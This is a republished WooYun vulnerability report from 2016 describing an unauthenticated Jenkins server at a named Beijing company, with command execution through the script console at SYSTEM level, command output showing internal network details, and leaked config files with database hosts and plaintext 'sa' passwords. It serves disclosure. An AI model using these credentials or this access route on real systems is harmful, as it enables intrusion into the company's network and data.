鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

admin 2017年4月1日04:37:01评论402 views字数 253阅读0分50秒阅读模式
摘要

2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-188450

漏洞标题: 鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

相关厂商: 北京鼎立安信科技有限公司

漏洞作者: 路人甲

提交时间: 2016-03-24 13:54

公开时间: 2016-05-08 13:54

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 未授权访问

1人收藏


漏洞详情

披露状态:

2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

mask 区域
*****科技*****
1.http://**.**.**/_
**********
*****题*****
2.http://**.**.**/_
**********
*****权*****
**********
*****40075c0b680569d54480.png&qu*****
**********
*****项*****
*****6a214202063201907fe3.png&qu*****
**********
*****s/%E5%AD%90%E7%B3%BB%E7%BB*****
**********
*****afad19d1c281196a2e2a.png&qu*****
**********
*****AD%E9%97%B4%E4%BB%B6%E7%9B%B8%E5%85%B3%E7%A8%8B%E5%BA%8F/1226%E5%AD*****
*****几个s*****
*****更数据库*****
*****nitial Catalog=BSPatrol;User ID=sa;Pa*****
*****数据库*****
*****;Initial Catalog=1226;User ID=sa;Pas*****
*****数据库*****
*****al Catalog=AIO20150803150434;User ID=sa;*****
*****更新时*****
*****value="01:00&q*****
**********
*****水潭 *****
**********
*****一*****
**********
**********
3.http://**.**.**/script_
**********
*****m*****
**********
*****ae53b2c4cfeca7112dd1.png&qu*****
***** (部*****
**********
*****适配器 *****
**********
*****S 后缀 . *****
*****. . . . . : Net*****
*****. . . . . . : 0*****
***** . . . . . *****
*****. . . . . .*****
*****. . : fe80::2ded:d17*****
*****. . . . . : 10.*****
*****. . . . . . . *****
*****. . . . . .*****
*****. . . . . . *****
***** : 00-01-00-01-19-6E*****
***** . . . . . . *****
***** *****
*****. . . . . : 已*****
**********
**********
*****:/ *****
***** <DIR> *****
*****; 在*****
*****DIR> *****
*****gt; *****
*****R> *****
*****R> *****
*****t;DIR> *****
*****DIR> *****
*****t;DIR> *****
*****DIR> *****
***** 鼎立安*****
*****管理//HRG*****
*****帴鏁版*****
*****0.90;Initial Catalog=HRG;User ID=sa;Pas*****
*****2.3;Initial Catalog=HRG;User ID=sa;P*****
*****s><*****
**********
*****开*****
*****8f4f8ab1d7a3a8f14abb.png&qu*****
**********
***** 10.171.11*****
*****理地址 *****
*****-0c-9f-f2-bc *****
*****-6a-aa-0d-bc *****
*****-6a-a2-a6-3c *****
*****-ff-ff-ff-ff *****
*****-5e-00-00-16 *****
*****-5e-00-00-fc *****
*****-5e-4d-7c-d5 *****
*****-5e-7f-ff-fa *****
*****-ff-ff-ff-ff *****
**********
*****2.162.3*****
*****理地址 *****
*****-0c-9f-f3-20 *****
*****-6a-aa-0d-bc *****
*****-6a-a2-a6-3c *****
*****-ff-ff-ff-ff *****
*****-5e-00-00-16 *****
*****-5e-00-00-fb *****
*****-5e-00-00-fc *****
*****-5e-4d-7c-d5 *****
*****7f-ff-fa 静*****

漏洞证明:

北京鼎立安信科技有限公司

http://www.dlax.com.cn/

存在问题的url

http://www.dlax.com.cn:8080/

jenkins未授权访问

鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

这么多项目。

鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

code 区域
http://182.92.162.3:8080/job/BWU_SIMP/ws/%E5%AD%90%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3/

鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

code 区域
http://182.92.162.3:8080/job/BWU_SIMP/ws/%E5%AD%90%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3/%E5%AD%90%E7%B3%BB%E7%BB%9F%E4%B8%AD%E9%97%B4%E4%BB%B6%E7%9B%B8%E5%85%B3%E7%A8%8B%E5%BA%8F/1226%E5%AD%90%E7%B3%BB%E7%BB%9F/1226%E5%B7%A1%E6%9B%B4/PetrolSystem/App.config/*view*/

部分内容 好几个sa密码

code 区域
<!--巡更数据库地址-->
<add key="ConnDB" value="Data Source=23.48.38.240;Initial Catalog=BSPatrol;User ID=sa;Password=simp2014;Max Pool Size = 512;" />
<!--平台数据库地址-->
<add key="SimpDB" value="Data Source=23.48.38.239;Initial Catalog=1226;User ID=sa;Password=simp2014;Max Pool Size = 512;" />
<!--达实数据库地址-->
<add key="DSConnDB" value="Data Source=23.48.38.240;Initial Catalog=AIO20150803150434;User ID=sa;Password=simp2014;Max Pool Size = 512;" />
<!--定时更新时间-->
<add key="TimeFlag" value="01:00" />

什么农大 积水潭 都有

不在一一截图

命令执行

http://182.92.162.3:8080/script

system权限

鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

ipconfig /all (部分内容)

内网环境

code 区域
以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Net Device PV Driver
物理地址. . . . . . . . . . . . . : 00-16-3E-00-16-64
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::2ded:d17b:133a:b7b4%13(首选)
IPv4 地址 . . . . . . . . . . . . : 10.171.114.103(首选)
子网掩码 . . . . . . . . . . . . : 255.255.248.0
默认网关. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 369104446
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-19-6E-83-66-02-00-4C-4F-4F-50
DNS 服务器 . . . . . . . . . . . : 10.202.72.118
10.202.72.116
TCPIP 上的 NetBIOS . . . . . . . : 已启用

主站就在这

dir d:/

code 区域
2016/03/15  10:35    <DIR>          人脸识别
2016/01/07 12:13 <DIR> 在线考试相关文件
2016/02/26 11:50 <DIR> 安装软件
2016/03/08 10:12 <DIR> 户籍项目管理
2016/03/17 14:09 <DIR> 手机测试用
2015/11/18 15:43 <DIR> 新建文件夹
2016/01/29 14:45 <DIR> 无用
2016/03/11 15:29 <DIR> 测试用的
2016/02/24 11:28 <DIR> 超图
2015/11/06 10:27 <DIR> 项目备份
2016/01/26 11:21 <DIR> 鼎立安信主页

type d://户籍项目管理//HRG//Web.config

code 区域
<!--杩炴帴鏁版嵁搴�->
<!--<add key="ConnectDB" value="Data Source=192.168.0.90;Initial Catalog=HRG;User ID=sa;Password=simp2014;Max Pool Size = 512;"/>-->
<add key="ConnectDB" value="Data Source=182.92.162.3;Initial Catalog=HRG;User ID=sa;Password=simp2014;Max Pool Size = 512;"/>
</appSettings>

3389是开着的

鼎立安信某系统未授权访问(涉及多个项目源码)/导致命令执行/system权限/可登录终端渗透内网

code 区域
接口: 10.171.114.103 --- 0xd
Internet 地址 物理地址 类型
10.171.119.247 00-00-0c-9f-f2-bc 动态
10.171.119.248 00-2a-6a-aa-0d-bc 动态
10.171.119.249 00-2a-6a-a2-a6-3c 动态
10.171.119.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.77.124.213 01-00-5e-4d-7c-d5 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态

接口: 182.92.162.3 --- 0xe
Internet 地址 物理地址 类型
182.92.163.247 00-00-0c-9f-f3-20 动态
182.92.163.248 00-2a-6a-aa-0d-bc 动态
182.92.163.249 00-2a-6a-a2-a6-3c 动态
182.92.163.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.77.124.213 01-00-5e-4d-7c-d5 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态

修复方案:

加个验证

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin